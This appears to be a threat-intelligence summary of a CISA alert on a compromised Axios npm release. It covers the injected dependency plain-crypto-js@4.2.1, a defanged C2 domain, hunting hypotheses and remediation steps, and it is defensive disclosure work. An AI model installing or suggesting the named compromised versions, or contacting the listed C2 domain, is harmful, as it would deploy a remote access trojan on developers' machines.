Skip to content
.ca
sign in
4 mincritical

​​Supply Chain Compromise Impacts Axios Node Package Manager​

A software supply chain compromise impacted the Axios npm package, injecting a malicious dependency (plain-crypto-js@4.2.1) into versions 1.14.1 and 0.30.4. This dependency downloads multi-stage payloads, including a Remote Access Trojan (RAT), which communicates with a known malicious C2 domain.

Sens:ImmediateConf:highAnalyzed:2026-04-20reports

Authors: CISA

plain-crypto-jsAxiosnpmSupply ChainRAT

Source:CISA

IOCs · 1
  • domain
    sfrclak[[.]]comCommand and Control (C2) domain used to download multi-stage payloads and the Remote Access Trojan (RAT).

Key Takeaways

  • Axios npm versions 1.14.1 and 0.30.4 were compromised via a malicious dependency named plain-crypto-js@4.2.1.
  • The malicious dependency downloads multi-stage payloads, including a Remote Access Trojan (RAT).
  • The malware communicates with the C2 domain Sfrclak[.]com.
  • Organizations must immediately downgrade to safe versions (1.14.0 or 0.30.3) and rotate potentially exposed credentials.
  • Hardening npm configurations by setting ignore-scripts=true and min-release-age=7 can prevent similar attacks.

Affected Systems

  • Node.js environments
  • CI/CD pipelines
  • Developer machines using Axios npm versions 1.14.1 and 0.30.4

Attack Chain

Threat actors compromised the Axios npm package by injecting a malicious dependency, plain-crypto-js@4.2.1, into versions 1.14.1 and 0.30.4. When developers or CI/CD pipelines run package installation or update commands, the malicious package is downloaded. It then executes scripts to download multi-stage payloads from the C2 domain Sfrclak[.]com, ultimately deploying a Remote Access Trojan (RAT) on the affected machine.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules are provided in the alert, but behavioral monitoring recommendations and IOCs are listed.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions can monitor child processes spawned by npm and outbound network connections to known malicious domains. Network Visibility: Medium — Network monitoring can detect outbound connections to the C2 domain, though payload traffic may be encrypted. Detection Difficulty: Moderate — Detecting the specific C2 domain is straightforward, but distinguishing malicious npm script execution from legitimate build processes requires baseline tuning.

Required Log Sources

  • Process Creation Logs
  • DNS Query Logs
  • Network Connection Logs

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for unexpected child processes spawned by npm or node executables during package installation.Process CreationExecutionMedium
Search for outbound network connections to known malicious C2 domains originating from developer workstations or CI/CD servers.Network/DNSCommand and ControlLow

Control Gaps

  • Lack of dependency pinning
  • Execution of untrusted npm lifecycle scripts

Key Behavioral Indicators

  • npm or node processes spawning unusual shells or utilities
  • Anomalous outbound network connections during npm install or update

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Downgrade Axios to known safe versions (1.14.0 or 0.30.3).
  • Delete the node_modules/plain-crypto-js/ directory.
  • Block outbound connections to Sfrclak[.]com.
  • Rotate all potentially exposed credentials (VCS tokens, CI/CD secrets, cloud keys, npm tokens, SSH keys).

Infrastructure Hardening

  • Set ignore-scripts=true in the .npmrc configuration file to prevent malicious script execution during installation.
  • Set min-release-age=7 in the .npmrc configuration file to delay installation of newly published packages.
  • Pin npm package dependency versions to known safe releases.

User Protection

  • Mandate phishing-resistant multifactor authentication (MFA) on all developer accounts.

Security Awareness

  • Educate developers on the risks of supply chain attacks and the importance of reviewing package dependencies.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise of Software Dependencies and Development Tools
  • T1105 - Ingress Tool Transfer
  • T1071.001 - Application Layer Protocol: Web Protocols

Additional IOCs

  • Domains:
    • Sfrclak[[.]]com - C2 domain for multi-stage payloads and RAT
  • File Paths:
    • node_modules/plain-crypto-js/ - Directory of the malicious dependency to be deleted during remediation
  • Command Lines:
    • Purpose: Triggering the malicious dependency download and execution | Tools: npm | Stage: Execution | npm install
    • Purpose: Triggering the malicious dependency download and execution | Tools: npm | Stage: Execution | npm update
  • Other:
    • axios@1.14.1 - Compromised Axios version
    • axios@0.30.4 - Compromised Axios version
    • plain-crypto-js@4.2.1 - Malicious injected dependency

Related